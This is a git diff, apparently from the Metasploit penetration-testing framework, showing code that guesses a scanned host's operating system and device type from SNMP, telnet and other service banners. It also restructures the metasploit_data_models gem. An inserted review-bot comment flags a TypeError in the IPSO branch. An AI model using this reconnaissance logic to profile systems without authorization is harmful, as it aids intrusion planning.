$1].to_i + points + wvers[$1] = wvers[$1].to_i + points + arch = "x86" + warch[arch] = warch[arch].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^HP-UX ([^\s]+) ([^\s]+) / + # XXX + wname['HP-UX ' + $2] = wname['HP-UX ' + $2].to_i + points + wvers[$1] = wvers[$1].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^IBM PowerPC.*Base Operating System Runtime AIX version: (\d+\.\d+)/ + wname['IBM AIX ' + $1] = wname['IBM AIX ' + $1].to_i + points + wvers[$1] = wvers[$1].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^SCO TCP\/IP Runtime Release ([^\s]+)/ + wname['SCO UnixWare ' + $1] = wname['SCO UnixWare ' + $1].to_i + points + wvers[$1] = wvers[$1].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /.* IRIX 
version ([^\s]+)/ + wname['SGI IRIX ' + $1] = wname['SGI IRIX ' + $1].to_i + points + wvers[$1] = wvers[$1].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^Unisys ([^\s]+) version ([^\s]+) kernel/ + wname['Unisys ' + $2] = wname['Unisys ' + $2].to_i + points + wvers[$2] = wvers[$2].to_i + points + whost[$1] = whost[$1].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /.*OpenVMS V([^\s]+) / + # XXX + wname['OpenVMS ' + $1] = wname['OpenVMS ' + $1].to_i + points + wvers[$1] = wvers[$1].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^Hardware:.*Software: Windows NT Version ([^\s]+) / + wname['Microsoft Windows NT ' + $1] = wname['Microsoft Windows NT ' + $1].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^Hardware:.*Software: Windows 2000 Version 5\.0/ + wname['Microsoft Windows 2000'] = wname['Microsoft Windows 2000'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^Hardware:.*Software: Windows 2000 Version 5\.1/ + wname['Microsoft Windows XP'] = wname['Microsoft Windows XP'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^Hardware:.*Software: Windows Version 5\.2/ + wname['Microsoft Windows 2003'] = wname['Microsoft Windows 2003'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + # XXX: TODO 2008, Vista, Windows 7 + + when /^Microsoft Windows CE Version ([^\s]+)+/ + wname['Microsoft Windows CE ' + $1] = wname['Microsoft Windows CE ' + $1].to_i + points + wtype['client'] = wtype['client'].to_i + points + + when /^IPSO ([^\s]+) ([^\s]+) / + whost[$1] = whost[$1].to_i + points + wname['Nokia IPSO ' + $2] = wname['Nokia IPSO ' + $2].to_i + points + wvers[$2] = wvers[$2].to_i + points + arch = get_arch_from_string(s.info) + warch[arch] = warch[arch].to_s + points if arch + wtype['device'] = wtype['device'].to_i + points + + when /^Sun StorEdge/ + wname['Sun StorEdge'] = wname['Sun StorEdge'].to_i + 
points + wtype['device'] = wtype['device'].to_i + points + + when /^HP StorageWorks/ + wname['HP StorageWorks'] = wname['HP StorageWorks'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /^Network Storage/ + # XXX + wname['Network Storage Router'] = wname['Network Storage Router'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /Cisco Internetwork Operating System.*Version ([^\s]+)/ + vers = $1.split(/[,^\s]/)[0] + wname['Cisco IOS ' + vers] = wname['Cisco IOS ' + vers].to_i + points + wvers[vers] = wvers[vers].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /Cisco Catalyst.*Version ([^\s]+)/ + vers = $1.split(/[,^\s]/)[0] + wname['Cisco CatOS ' + vers] = wname['Cisco CatOS ' + vers].to_i + points + wvers[vers] = wvers[vers].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /Cisco 761.*Version ([^\s]+)/ + vers = $1.split(/[,^\s]/)[0] + wname['Cisco 761 ' + vers] = wname['Cisco 761 ' + vers].to_i + points + wvers[vers] = wvers[vers].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /Network Analysis Module.*Version ([^\s]+)/ + vers = $1.split(/[,^\s]/)[0] + wname['Cisco NAM ' + vers] = wname['Cisco NAM ' + vers].to_i + points + wvers[vers] = wvers[vers].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /VPN 3000 Concentrator Series Version ([^\s]+)/ + vers = $1.split(/[,^\s]/)[0] + wname['Cisco VPN 3000 ' + vers] = wname['Cisco VPN 3000 ' + vers].to_i + points + wvers[vers] = wvers[vers].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /ProCurve.*Switch/ + wname['3Com ProCurve Switch'] = wname['3Com ProCurve Switch'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /ProCurve.*Access Point/ + wname['3Com Access Point'] = wname['3Com Access Point'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /3Com.*Access Point/i + wname['3Com Access Point'] = 
wname['3Com Access Point'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /ShoreGear/ + wname['ShoreTel Appliance'] = wname['ShoreTel Appliance'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /firewall/i + wname['Unknown Firewall'] = wname['Unknown Firewall'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /phone/i + wname['Unknown Phone'] = wname['Unknown Phone'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /router/i + wname['Unknown Router'] = wname['Unknown Router'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /switch/i + wname['Unknown Switch'] = wname['Unknown Switch'].to_i + points + wtype['device'] = wtype['device'].to_i + points + # + # Printer Signatures + # + when /^HP ETHERNET MULTI-ENVIRONMENT/ + wname['HP Printer'] = wname['HP Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Canon/i + wname['Canon Printer'] = wname['Canon Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Epson/i + wname['Epson Printer'] = wname['Epson Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /ExtendNet/i + wname['ExtendNet Printer'] = wname['ExtendNet Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Fiery/i + wname['Fiery Printer'] = wname['Fiery Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Konica/i + wname['Konica Printer'] = wname['Konica Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Lanier/i + wname['Lanier Printer'] = wname['Lanier Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Lantronix/i + wname['Lantronix Printer'] = wname['Lantronix Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Lexmark/i + wname['Lexmark Printer'] = wname['Lexmark Printer'].to_i + points 
+ wtype['printer'] = wtype['printer'].to_i + points + when /Magicolor/i + wname['Magicolor Printer'] = wname['Magicolor Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Minolta/i + wname['Minolta Printer'] = wname['Minolta Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /NetJET/i + wname['NetJET Printer'] = wname['NetJET Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /OKILAN/i + wname['OKILAN Printer'] = wname['OKILAN Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Phaser/i + wname['Phaser Printer'] = wname['Phaser Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /PocketPro/i + wname['PocketPro Printer'] = wname['PocketPro Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Ricoh/i + wname['Ricoh Printer'] = wname['Ricoh Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Savin/i + wname['Savin Printer'] = wname['Savin Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /SHARP AR/i + wname['SHARP Printer'] = wname['SHARP Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Star Micronix/i + wname['Star Micronix Printer'] = wname['Star Micronix Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Source Tech/i + wname['Source Tech Printer'] = wname['Source Tech Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Xerox/i + wname['Xerox Printer'] = wname['Xerox Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /^Brother/i + wname['Brother Printer'] = wname['Brother Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /^Axis.*Network Print/i + wname['Axis Printer'] = wname['Axis Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + 
points + when /^Prestige/i + wname['Prestige Printer'] = wname['Prestige Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /^ZebraNet/i + wname['ZebraNet Printer'] = wname['ZebraNet Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /e\-STUDIO/i + wname['eStudio Printer'] = wname['eStudio Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /^Gestetner/i + wname['Gestetner Printer'] = wname['Gestetner Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /IBM.*Print/i + wname['IBM Printer'] = wname['IBM Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /HP (Color|LaserJet|InkJet)/i + wname['HP Printer'] = wname['HP Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Dell (Color|Laser|Ink)/i + wname['Dell Printer'] = wname['Dell Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Print/i + wname['Unknown Printer'] = wname['Unknown Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + end # End of s.info for SNMP + + when 'telnet' + points = 105 + case s.info + when /IRIX/ + wname['SGI IRIX'] = wname['SGI IRIX'].to_i + points + when /AIX/ + wname['IBM AIX'] = wname['IBM AIX'].to_i + points + when /(FreeBSD|OpenBSD|NetBSD)\/(.*) / + wname[$1] = wname[$1].to_i + points + arch = get_arch_from_string($2) + warch[arch] = warch[arch].to_i + points + when /Ubuntu (\d+(\.\d+)+)/ + wname['Linux'] = wname['Linux'].to_i + points + wflav['Ubuntu'] = wflav['Ubuntu'].to_i + points + wvers[$1] = wvers[$1].to_i + points + when /User Access Verification/ + wname['Cisco IOS'] = wname['Cisco IOS'].to_i + points + when /Microsoft/ + wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points + end # End of s.info for TELNET + wtype['server'] = wtype['server'].to_i + points + + when 'smtp' + points = 103 + case s.info + when 
/ESMTP.*SGI\.8/ + wname['SGI IRIX'] = wname['SGI IRIX'].to_i + points + wtype['server'] = wtype['server'].to_i + points + end # End of s.info for SMTP + + when 'https' + points = 101 + case s.info + when /(VMware\s(ESXi?)).*\s([\d\.]+)/ + # Very reliable fingerprinting from our own esx_fingerprint module + wname[$1] = wname[$1].to_i + (points * 5) + wflav[$3] = wflav[$3].to_i + (points * 5) + wtype['device'] = wtype['device'].to_i + points + end # End of s.info for HTTPS + + when 'netbios' + points = 201 + case s.info + when /W2K3/i + wname['Microsoft Windows 2003'] = wname['Microsoft Windows 2003'].to_i + points + wtype['server'] = wtype['server'].to_i + points + when /W2K8/i + wname['Microsoft Windows 2008'] = wname['Microsoft Windows 2008'].to_i + points + wtype['server'] = wtype['server'].to_i + points + end # End of s.info for NETBIOS + + when 'dns' + points = 101 + case s.info + when 'Microsoft DNS' + wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points + wtype['server'] = wtype['server'].to_i + points + end # End of s.info for DNS + end # End of s.name case + # End of Services + end + + # + # Report the best match here + # + best_match = {} + best_match[:os_name] = wname.keys.sort{|a,b| wname[b] <=> wname[a]}[0] + best_match[:purpose] = wtype.keys.sort{|a,b| wtype[b] <=> wtype[a]}[0] + best_match[:os_flavor] = wflav.keys.sort{|a,b| wflav[b] <=> wflav[a]}[0] + best_match[:os_sp] = wvers.keys.sort{|a,b| wvers[b] <=> wvers[a]}[0] + best_match[:arch] = warch.keys.sort{|a,b| warch[b] <=> warch[a]}[0] + best_match[:name] = whost.keys.sort{|a,b| whost[b] <=> whost[a]}[0] + best_match[:os_lang] = wlang.keys.sort{|a,b| wlang[b] <=> wlang[a]}[0] + + best_match[:os_flavor] ||= host[:os_flavor] || "" + if best_match[:os_name] + # Handle cases where the flavor contains the base name + # Don't use gsub!() here because the string was a hash key in a + # previously life and gets frozen on 1.9.1, see #4128 + best_match[:os_flavor] = 
best_match[:os_flavor].gsub(best_match[:os_name], '') + end + + # If we didn't get anything, use whatever the host already has. + # Failing that, fallback to "Unknown" + best_match[:os_name] ||= host[:os_name] || 'Unknown' + best_match[:purpose] ||= 'device' + + [:os_name, :purpose, :os_flavor, :os_sp, :arch, :name, :os_lang].each do |host_attr| + next if host.attribute_locked? host_attr + if best_match[host_attr] + host[host_attr] = Rex::Text.ascii_safe_hex(best_match[host_attr]) + end + end + + host.save if host.changed? + end + + # Determine if the fingerprint data is readable. If not, it nearly always + # means that there was a problem with the YAML or the Marshal'ed data, + # so let's log that for later investigation. + def validate_fingerprint_data(fp) + if fp.data.kind_of?(Hash) and !fp.data.empty? + return true + elsif fp.ntype == "postgresql.fingerprint" + # Special case postgresql.fingerprint; it's always a string, + # and should not be used for OS fingerprinting (yet), so + # don't bother logging it. TODO: fix os fingerprint finding, this + # name collision seems silly. + return false + else + dlog("Could not validate fingerprint data: #{fp.inspect}") + return false + end + end + + protected + + # + # Convert a host.os.*_fingerprint Note into a hash containing the standard os_* fields + # + # Also includes a :certainty which is a float from 0 - 1.00 indicating the + # scanner's confidence in its fingerprint. If the particular scanner does + # not provide such information, defaults to 0.80. + # + # TODO: This whole normalize scanner procedure needs to be shoved off to its own + # mixin. It's far too long and convoluted, has a ton of repeated code, and is + # a massive hassle to update with new fingerprints. 
+ def normalize_scanner_fp(fp) + return {} if not validate_fingerprint_data(fp) + ret = {} + data = fp.data + case fp.ntype + when 'host.os.session_fingerprint' + # These come from meterpreter sessions' client.sys.config.sysinfo + case data[:os] + when /Windows/ + ret.update(parse_windows_os_str(data[:os])) + when /Linux ([^[:space:]]*) ([^[:space:]]*) .* (\(.*\))/ + ret[:os_name] = "Linux" + ret[:name] = $1 + ret[:os_sp] = $2 + ret[:arch] = get_arch_from_string($3) + else + ret[:os_name] = data[:os] + end + ret[:arch] = data[:arch] if data[:arch] + ret[:name] = data[:name] if data[:name] + + when 'host.os.nmap_fingerprint', 'host.os.mbsa_fingerprint' + # :os_vendor=>"Microsoft" :os_family=>"Windows" :os_version=>"2000" :os_accuracy=>"94" + # + # :os_match=>"Microsoft Windows Vista SP0 or SP1, Server 2008, or Windows 7 Ultimate (build 7000)" + # :os_vendor=>"Microsoft" :os_family=>"Windows" :os_version=>"7" :os_accuracy=>"100" + ret[:certainty] = data[:os_accuracy].to_f / 100.0 + if (data[:os_vendor] == data[:os_family]) + ret[:os_name] = data[:os_family] + else + ret[:os_name] = data[:os_vendor] + " " + data[:os_family] + end + ret[:os_flavor] = data[:os_version] + ret[:name] = data[:hostname] if data[:hostname] + + when 'host.os.nexpose_fingerprint' + # :family=>"Windows" :certainty=>"0.85" :vendor=>"Microsoft" :product=>"Windows 7 Ultimate Edition" + # :family=>"Linux" :certainty=>"0.64" :vendor=>"Linux" :product=>"Linux" + # :family=>"Linux" :certainty=>"0.80" :vendor=>"Ubuntu" :product=>"Linux" + # :family=>"IOS" :certainty=>"0.80" :vendor=>"Cisco" :product=>"IOS" + # :family=>"embedded" :certainty=>"0.61" :vendor=>"Linksys" :product=>"embedded" + ret[:certainty] = data[:certainty].to_f + case data[:family] + when /AIX|ESX|Mac OS X|OpenSolaris|Solaris|IOS|Linux/ + if data[:vendor] == data[:family] + ret[:os_name] = data[:vendor] + else + # family often contains the vendor string, so rip it out to + # avoid useless duplication + ret[:os_name] = 
data[:vendor].to_s + " " + data[:family].to_s.gsub(data[:vendor].to_s, '').strip + end + when "Windows" + ret[:os_name] = "Microsoft Windows" + if data[:product] + if data[:product][/2008/] && data[:version].to_i == 7 + ret[:os_flavor] = "Windows 7" + ret[:type] = "client" + else + ret[:os_flavor] = data[:product].gsub("Windows", '').strip + ret[:os_sp] = data[:version] if data[:version] + if data[:product] + ret[:type] = "server" if data[:product][/Server/] + ret[:type] = "client" if data[:product][/^(XP|ME)$/] + end + end + end + when "embedded" + ret[:os_name] = data[:vendor] + else + ret[:os_name] = data[:vendor] + end + ret[:arch] = get_arch_from_string(data[:arch]) if data[:arch] + ret[:arch] ||= get_arch_from_string(data[:desc]) if data[:desc] + + when 'host.os.retina_fingerprint' + # :os=>"Windows Server 2003 (X64), Service Pack 2" + case data[:os] + when /Windows/ + ret.update(parse_windows_os_str(data[:os])) + else + # No idea what this looks like if it isn't windows. Just store + # the whole thing and hope for the best. XXX: Ghetto. =/ + ret[:os_name] = data[:os] + end + when 'host.os.nessus_fingerprint' + # :os=>"Microsoft Windows 2000 Advanced Server (English)" + # :os=>"Microsoft Windows 2000\nMicrosoft Windows XP" + # :os=>"Linux Kernel 2.6" + # :os=>"Sun Solaris 8" + # :os=>"IRIX 6.5" + + # Nessus sometimes jams multiple OS names together with a newline. + oses = data[:os].split(/\n/) + if oses.length > 1 + # Multiple fingerprints means Nessus wasn't really sure, reduce + # the certainty accordingly + ret[:certainty] = 0.5 + else + ret[:certainty] = 0.8 + end + + # Since there is no confidence associated with them, the best we + # can do is just take the first one. 
+ case oses.first + when /Windows/ + ret.update(parse_windows_os_str(data[:os])) + + when /(2\.[46]\.\d+[-a-zA-Z0-9]+)/ + # Linux kernel version + ret[:os_name] = "Linux" + ret[:os_sp] = $1 + when /(.*)?((\d+\.)+\d+)$/ + # Then we don't necessarily know what the os is, but this + # fingerprint has some version information at the end, pull it + # off. + # When Nessus doesn't know what kind of linux it has, it gives an os like + # "Linux Kernel 2.6" + # The "Kernel" string is useless, so cut it off. + ret[:os_name] = $1.gsub("Kernel", '').strip + ret[:os_sp] = $2 + else + ret[:os_name] = oses.first + end + + ret[:name] = data[:hname] + when 'host.os.qualys_fingerprint' + # :os=>"Microsoft Windows 2000" + # :os=>"Windows 2003" + # :os=>"Microsoft Windows XP Professional SP3" + # :os=>"Ubuntu Linux" + # :os=>"Cisco IOS 12.0(3)T3" + case data[:os] + when /Windows/ + ret.update(parse_windows_os_str(data[:os])) + else + parts = data[:os].split(/\s+/, 3) + ret[:os_name] = "" + ret[:os_name] = parts[0] if parts[0] + ret[:os_name] << " " + parts[1] if parts[1] + ret[:os_sp] = parts[2] if parts[2] + end + # XXX: We should really be using smb_version's stored fingerprints + # instead of parsing the service info manually. Disable for now so we + # don't count smb twice. + #when 'smb.fingerprint' + # # smb_version is kind enough to store everything we need directly + # ret.merge(fp.data) + # # If it's windows, this should be a pretty high-confidence + # # fingerprint. Otherwise, it's samba which doesn't give us much of + # # anything in most cases. 
+ # ret[:certainty] = 1.0 if fp.data[:os_name] =~ /Windows/ + when 'host.os.fusionvm_fingerprint' + case data[:os] + when /Windows/ + ret.update(parse_windows_os_str(data[:os])) + when /Linux ([^[:space:]]*) ([^[:space:]]*) .* (\(.*\))/ + ret[:os_name] = "Linux" + ret[:name] = $1 + ret[:os_sp] = $2 + ret[:arch] = get_arch_from_string($3) + else + ret[:os_name] = data[:os] + end + ret[:arch] = data[:arch] if data[:arch] + ret[:name] = data[:name] if data[:name] + else + # If you've fallen through this far, you've hit a generalized + # pass-through fingerprint parser. + ret[:os_name] = data[:os_name] || data[:os] || data[:os_fingerprint] || "" + ret[:type] = data[:os_purpose] if data[:os_purpose] + ret[:arch] = data[:os_arch] if data[:os_arch] + ret[:certainty] = data[:os_certainty] || 0.5 + end + ret[:certainty] ||= 0.8 + ret + end + + # + # Take a windows version string and return a hash with fields suitable for + # Host this object's version fields. + # + # A few example strings that this will have to parse: + # sessions + # Windows XP (Build 2600, Service Pack 3). + # Windows .NET Server (Build 3790). + # Windows 2008 (Build 6001, Service Pack 1). + # retina + # Windows Server 2003 (X64), Service Pack 2 + # nessus + # Microsoft Windows 2000 Advanced Server (English) + # qualys + # Microsoft Windows XP Professional SP3 + # Windows 2003 + # + # Note that this list doesn't include nexpose or nmap, since they are + # both kind enough to give us the various strings in seperate pieces + # that we don't have to parse out manually. 
+ # + def parse_windows_os_str(str) + ret = {} + + ret[:os_name] = "Microsoft Windows" + arch = get_arch_from_string(str) + ret[:arch] = arch if arch + + if str =~ /(Service Pack|SP) ?(\d+)/ + ret[:os_sp] = "SP#{$2}" + end + + # Flavor + case str + when /\.NET Server/ + ret[:os_flavor] = "2003" + when /(XP|2000 Advanced Server|2000|2003|2008|SBS|Vista|7 .* Edition|7)/ + ret[:os_flavor] = $1 + else + # If we couldn't pull out anything specific for the flavor, just cut + # off the stuff we know for sure isn't it and hope for the best + ret[:os_flavor] ||= str.gsub(/(Microsoft )?Windows|(Service Pack|SP) ?(\d+)/, '').strip + end + + if str =~ /NT|2003|2008|SBS|Server/ + ret[:type] = 'server' + else + ret[:type] = 'client' + end + + ret + end + + # A case switch to return a normalized arch based on a given string. + def get_arch_from_string(str) + case str + when /x64|amd64|x86_64/i + "x64" + when /x86|i[3456]86/i + "x86" + when /PowerPC|PPC|POWER|ppc/ + "ppc" + when /SPARC/i + "sparc" + when /MIPS/i + "mips" + when /ARM/i + "arm" + else + nil + end + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models.rb index 2605aa3d41..0513b84756 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models.rb 
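Review bot: In `normalize_os`, the SNMP `/^IPSO ([^\s]+) ([^\s]+) /` branch tallies the architecture with `warch[arch].to_s + points`, which raises a TypeError (String + Integer) whenever `get_arch_from_string` returns a value, so normalization for that host aborts; the sibling Linux branch uses `.to_i`, and this line should read `warch[arch] = warch[arch].to_i + points if arch`. Because `s.info` is banner text supplied by the scanned host, the exception is reachable from remote data and deserves a regression test using an IPSO description that contains an architecture token. In the same method the SMB hostname pattern `/name: ([^\)]+)\)/` requires a space that the sample banners in the comment above it (`(name:PG-WIN2008WEB)`) do not have, so `hostname` appears never to be set from those strings; `/name:\s*([^\)]+)\)/` would accept both forms. The file sits under `lib/gemcache`, so the fix presumably belongs upstream in metasploit_data_models as well.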
@@ -1,63 +1,60 @@ -require "active_record" -require "active_support" -require "active_support/all" -require "shellwords" +# +# Core +# +require 'shellwords' -require "metasploit_data_models/version" -require "metasploit_data_models/serialized_prefs" -require "metasploit_data_models/base64_serializer" +# +# Gems +# +require 'active_record' +require 'active_support' +require 'active_support/all' +require 'active_support/dependencies' -require "metasploit_data_models/validators/ip_format_validator" -require "metasploit_data_models/validators/password_is_strong_validator" +# +# Project +# +require 'mdm' +require 'metasploit_data_models/version' +require 'metasploit_data_models/serialized_prefs' +require 'metasploit_data_models/base64_serializer' +require 'metasploit_data_models/validators/ip_format_validator' +require 'metasploit_data_models/validators/password_is_strong_validator' -# Declare the (blessedly short) common namespace for the ActiveRecord classes -module Mdm; end +# Only include the Rails engine when using Rails. This allows the non-Rails projects, like metasploit-framework to use +# the models by calling MetasploitDataModels.require_models. +if defined? Rails + require 'metasploit_data_models/engine' +end module MetasploitDataModels - module ActiveRecordModels; end - - # Dynamically create AR classes if being included from Msf::DBManager - # otherwise, just make the modules available for arbitrary inclusion. - def self.included(base) - ar_mixins.each{|file| require file} - create_and_load_ar_classes if base.to_s == 'Msf::DBManager' + def self.models_pathname + root.join('app', 'models') end - # The code in each of these represents the basic structure of a correspondingly named - # ActiveRecord model class. Those classes are explicitly created in our Rails app - # for the commercial versions, and the functionality from the mixins is included - # into model classes directly. 
- # - # When not explicitly overloading the classes in your own files use MetasploitDataModels#create_and_load_ar_classes - # to dynamically generate ActiveRecord classes in the Mdm namespace. - def self.ar_mixins - models_dir = File.expand_path(File.dirname(__FILE__)) + "/metasploit_data_models/active_record_models" - Dir.glob("#{models_dir}/*.rb") - end + def self.require_models + models_globs = models_pathname.join('**', '*.rb') - # Dynamically create ActiveRecord descendant classes in the Mdm namespace - def self.create_and_load_ar_classes - ar_module_names.each do |cname| - class_str =<<-RUBY - class Mdm::#{cname} < ActiveRecord::Base - include MetasploitDataModels::ActiveRecordModels::#{cname} - end - RUBY - eval class_str, binding, __FILE__, __LINE__ # *slightly* more obvious stack trace + Dir.glob(models_globs) do |model_path| + require model_path end end - # Derive "constant" strings from the names of the files in - # lib/metasploit_data_models/active_record_models - def self.ar_module_names - ar_mixins.inject([]) do |array, path| - filename = File.basename(path).split(".").first - c_name = filename.classify - c_name << "s" if filename =~ /^[\w]+s$/ # classify can't do plurals - array << c_name - array - end - end + def self.root + unless instance_variable_defined? :@root + lib_pathname = Pathname.new(__FILE__).dirname + @root = lib_pathname.parent + end + + @root + end end + +lib_pathname = MetasploitDataModels.root.join('lib') +# has to work under 1.8.7, so can't use to_path +lib_path = lib_pathname.to_s +# Add path to gem's lib so that concerns for models are loaded correctly if models are reloaded +ActiveSupport::Dependencies.autoload_paths << lib_path +ActiveSupport::Dependencies.autoload_once_paths << lib_path 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/engine.rb new file mode 100644 index 0000000000..27f7df2994 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/engine.rb @@ -0,0 +1,7 @@ +require 'rails' + +module MetasploitDataModels + class Engine < Rails::Engine + + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb index e4d0997133..e68300cf0c 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb @@ -1,3 +1,7 @@ module MetasploitDataModels - VERSION = "0.0.2" + # MetasploitDataModels follows the {Semantic Versioning Specification http://semver.org/}. At this time, the API + # is considered unstable because the database migrations are still in metasploit-framework and certain models may not + # be shared between metasploit-framework and pro, so models may be removed in the future. Because of the unstable API + # the version should remain below 1.0.0 + VERSION = '0.3.0' end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec index e04e223f5f..3a26fb1312 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec 
@@ -17,9 +17,10 @@ Gem::Specification.new do |s| s.require_paths = ["lib"] # ---- Dependencies ---- - s.add_development_dependency "rspec" - s.add_runtime_dependency "activerecord" - s.add_runtime_dependency "activesupport" - s.add_runtime_dependency "pg" - s.add_runtime_dependency "pry" + s.add_development_dependency 'rake' + + s.add_runtime_dependency 'activerecord' + s.add_runtime_dependency 'activesupport' + s.add_runtime_dependency 'pg' + s.add_runtime_dependency 'pry' end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/script/rails new file mode 100644 index 0000000000..7514bd40b3 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/script/rails @@ -0,0 +1,8 @@ +#!/usr/bin/env ruby +# This command will automatically be run when you run "rails" with Rails 3 gems installed from the root of your application. + +ENGINE_ROOT = File.expand_path('../..', __FILE__) +ENGINE_PATH = File.expand_path('../../lib/metasploit_data_models/engine', __FILE__) + +require 'rails/all' +require 'rails/engine/commands' \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/Rakefile new file mode 100644 index 0000000000..36458522cb --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/Rakefile @@ -0,0 +1,7 @@ +#!/usr/bin/env rake +# Add your own tasks in files placed in lib/tasks ending in .rake, +# for example lib/tasks/capistrano.rake, and they will automatically be available to Rake. + +require File.expand_path('../config/application', __FILE__) + +Dummy::Application.load_tasks 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/javascripts/application.js b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/javascripts/application.js new file mode 100644 index 0000000000..9097d830e2 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/javascripts/application.js @@ -0,0 +1,15 @@ +// This is a manifest file that'll be compiled into application.js, which will include all the files +// listed below. +// +// Any JavaScript/Coffee file within this directory, lib/assets/javascripts, vendor/assets/javascripts, +// or vendor/assets/javascripts of plugins, if any, can be referenced here using a relative path. +// +// It's not advisable to add code directly here, but if you do, it'll appear at the bottom of the +// the compiled file. +// +// WARNING: THE FIRST BLANK LINE MARKS THE END OF WHAT'S TO BE PROCESSED, ANY BLANK LINE SHOULD +// GO AFTER THE REQUIRES BELOW. +// +//= require jquery +//= require jquery_ujs 